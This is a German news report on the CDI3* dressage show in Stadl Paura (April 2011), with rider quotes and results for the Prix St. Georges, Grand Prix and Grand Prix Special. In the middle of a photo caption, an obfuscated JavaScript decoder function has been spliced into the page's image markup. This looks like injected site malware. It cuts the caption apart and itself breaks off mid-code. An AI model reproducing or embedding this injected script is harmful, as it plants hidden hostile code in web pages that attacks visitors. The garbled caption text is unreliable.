CDI3* Stadl Paura (AUT): Heike Kemmer Zweite im FEI Grand Prix

25. April 2011 | Von Redaktion | Kategorie: Dressursport, Top Feature, Turniere

[Stadl Paura (AUT), 24-04-2011/T. Deisl].  Eine phänomenale Prüfung gelang heute Vormittag Christian Schumach (AUT) auf seinem imposanten „Auheim´s Rhaposario“, einem erst achtjährigen Fuchshengst aus dem Zuchtgebiet Oldenburg von Rosario.

Christian Schuhmach (AUT) mit Auheim's Rhaposario (Foto: G. Krammer).

Christian Schuhmach (AUT) mit Auheim's Rhaposario (Foto: G. Krammer).

Es ging um den Prix St. Georges und um die Qualifikation für die morgige Intermediaire I, für den nur die besten 15 der heutigen Prüfung startberechtigt sind. Mit 69,73 Prozentpunkten verwies der Grand Prix Sieger der Sichtung Marlies van Baalen (NED) am zweiten Rang. Die Niederländerin wurde auf „Everything is possible“, einer zehnjährigen Stute von Ehrentanz I, mit 69,32 Prozentpunkten bewertet. Dritte wurde Pia Gabriel (AUT), die auf dem erst neunjährigen Acorado-Sohn „Al Pacino 44“ einen fabelhaften Ritt hinlegte. „Im Großen und Ganzen war die Prüfung fehlerfrei. Einmal hatte er sich erschrocken, aber war Gott sei Dank gleich wieder konzentriert. Es hat mir sehr viel Spaß gemacht. Vor allem, weil ich auf internationaler Ebene das erste Mal unter den Top-Drei platziert war.“, freute sich die 24-jährige Wienerin. In die Platzierung ritten darüber hinaus Nina Stadlinger (AUT), die sich auf „Quandu“ am sechsten Platz rangierte, und Stefan Peter (AUT), der mit „Schneekoppe Dot Com“ Siebenter wurde.

Erneut on Top: Victoria Max-Theurer (AUT) und „Augustin OLD“ entscheiden den Grand Prix Special (Tour A) für sich

Pia Gabriel (AUT) mit Al Pacino $$ (Foto: G. Krammer).

Pia Gabriel (AUT) mit Al Pacino $$ (Foto: G. Krammer).

Nachdem im gestrigen Grand Prix (Tour A) schon alles perfekt für Victoria Max-Theurer (AUT) und ihrem schicken Hengst „Augustin OLD“ lief, zogen sie als haushohe Favoriten in den sonntägigen finalen Grand Prix Special (Tour A) ein, wo sie auch mit 75,58 Prozentpunkten beeindruckend siegreich waren. „Augustin lief heute wieder sehr gut. Im Gegensatz zu gestern bin ich auch mehr geritten und legte die Prüfung mit mehr Schwung an. Ich habe immer das Gefühl, dass er im Viereck alles geben will, und er ist einfach ein perfektes Dressurpferd im klassischen Sinn.“, schwärmte Vicky von ihrem Oldenburger, der selbst gezüchtet und von ihr ausgebildet wurde. Den zweiten Platz der gestrigen Qualifikationsprüfung konnte die Kanadierin Belinda Trussel erringen. Im Sattel ihres im Jahr 2000 geborenen Antaeus-Sohns „Anton“ bekam sie 71,17 Prozentpunkte. Um einen Rang verbessern konnte sich die mehrfach ausgezeichnete beste Reiterin Irlands Anna Merveldt, die auf dem fünfzehnjährigen Wallach „Coryolano“ (von Coriolan) mit 68,58 Prozentpunkten bewertet wurde. Wie schon beim gestrigen Grand Prix sicherte sich Andrea John das zweitbeste rot-weiß-rote Resultat. Mit ihrem bewährten „Esperanto 4“, einem in Hannover gezogenen Nachkommen des Escudo II, wurde sie am Ende Vierte. Unter den Top-Ten platziert waren weiters die drei heimischen Dressurreiterinnen Renate Voglsang am siebenten, Karina Prochaska am achten und Astrid Neumayer am neunten Rang (67,67 %).

Heike Kemmer (GER) mit Feleciano (Foto: G. Krammer).

Heike Kemmer (GER) mit Feleciano (Foto: G. Krammer).

Victoria Max-Theurer (AUT) triumphierte im abendlichem Grand Prix (Tour B)

Victoria Max-Theurer (AUT) sicherte sich mit Eichendorff im FEI Gr<script type=function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand Prix Special den ersten Platz (Foto: Fotoagentur Dill)." width="200" height="300" />

Im letzten Bewerb des heutigen vierten Turniertages beim CDI3* in Stadl-Paura traten insgesamt 24 SpitzenreiterInnen im Grand Prix (Tour B) an. Die besten 15 von ihnen bekamen das ersehnte Ticket für das morgige finale Highlight des Wochenendes - die Musikkür. Bis zur letzten Starterin führte die dreifache Olympiamedaillengewinnerin, Mannschaftsweltmeisterin und das heutige Geburtstagskind Heike Kemmer (GER) mit „Feliciano“, einem in Westfalen gezogenen Sohn des Florestan I, das Feld an (69,94 %). Als letzte Starterin kam Victoria Max-Theurer in die Bahn. Die zurzeit am sechsten Rang der Weltrangliste gereihte Oberösterreicherin sattelte ihren dreizehnjährigen Ehrentusch-Nachkommen „Eichendorff“, mit dem ihr – bis auf einem kleinen Patzer bei den Einser-Wechseln – eine makellose Prüfung gelang. „Mit unserer Vorstellung bin ich mehr als zufrieden. Ich habe ehrlich gesagt auch gar nicht damit gerechnet, dass es für den Sieg reichen wird, weil Heike wirklich gut war, und ich ja bei den Wechseln einen Fehler hatte. Mein heutiges Ergebnis von 70,66 Prozentpunkten ist übrigens auch unser neuer persönlicher Rekord.“, freute sich die Siegerin Victoria Max-Theurer. Hinter der deutschen Erfolgsamazone Heike Kemmer reihte sich ihr Schützling Pia Fortmüller (CAN), die auf den KWPN-Wallach „Orion“ (von Jazz) setzte (69,77 %), am dritten Platz ein. Eine Spitzenplatzierung am sechsten Rang schaffte Rang Karina Prochaska (AUT) mit dem in Hannover gezogenen Sohn des Top-Vererbers Donnerhall „Dow Jones 2“ (66,85 %).

Ergebnisse: Sonntag, 24. April 2011

Bewerb 11 FEI Prix St. Georges

Heike Kemmer (GER) bei der Siegerehrung (Foto: G. Krammer).

Heike Kemmer (GER) bei der Siegerehrung (Foto: G. Krammer).

1.Auheim's Rhaposario / Schumach Christian (AUT) - 1318,00 / 69,37%

2.Everything is possible / Van Baalen Marlies (NED) - 1317,00 / 69,32%

3.Al Pacino 44 / Gabriel Pia (AUT) - 1304,50 / 68,66%

4.Blue Boy / Nevermann Torup Carina (DEN) - 1283,50 / 67,55%

5.Final Destination / Coppard-Dornig Julia (GBR) - 1277,00 / 67,21%

6.Quandu / Stadlinger Nina (AUT) - 1272,00 / 66,95%

7.Schneekoppe Dot Com / Peter Stefan (AUT) - 1269,00 / 66,79%

Bewerb 12 FEI Grand Prix (Tour B)

1.Eichendorff / Max-Theurer Victoria (AUT) - 1660,50 / 70,66%

2.Feleciano / Kemmer Heike (GER) - 1643,50 / 69,94%

3.Orion / Fortmüller Pia (CAN) - 1639,50 / 69,77%

4.Weltino 7 / Zierer Ludwig (GER) - 1579,50 / 67,21%

5.Fantomas IV / Weihermüller Stefanie (GER) - 1578,00 / 67,15%

6.Dow Jones 2 / Prochaska Karina (AUT) - 1571,00 / 66,85%

Bewerb 13 FEI Grand Prix Special (Tour A)

1.Augustin OLD / Max-Theurer Victoria (AUT) - 1814,00 / 75,58%

Christian Schumach bei der Siegerehrung (Foto: G. Krammer).

Christian Schumach bei der Siegerehrung (Foto: G. Krammer).

2.Anton / Trussell Belinda (CAN) - 1708,00 / 71,17%

3.Coryolano / Merveldt Anna (IRL) - 1646,00 / 68,58%

4.Esperanto 4 / John Andrea (AUT) - 1624,00 / 67,67%

5.Quantico / Kemmer Heike (GER) - 1620,00 / 67,50%

6.Don Dior / Freund Frank (GER) - 1609,00 / 67,04%

7.Fabriano 58 / Voglsang Renate (AUT) - 1603,00 / 66,79%

8.Mirage 2 / Prochaska Karina (AUT) - 1578,50 / 65,77%

9.Everglade / Neumayer Astrid (AUT) - 1574,00 / 65,58%

10.Fatinitza / Makarova Tatiana (RUS) - 1566,50 / 65,27%

11.Ferra / Ramseier Daniel (SUI) - 1559,00 / 64,96%

12.Khuzum-Kair / Pyrkina Anna (RUS) - 1550,00 / 64,58%

13.Glock's Flirt De Lully - Schoenmakers Marcel (NED) - 1548,00 / 64,50%

14.Ronaldo 145 / Stieglmaier Franziska (GER) - 1545,50 / 64,40%

15.BMC Miciano / Van Baalen Marlies (NED) - 1536,50 / 64,02%

Tags: , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=50134

Hier klicken, um einen Kommentar zu schreiben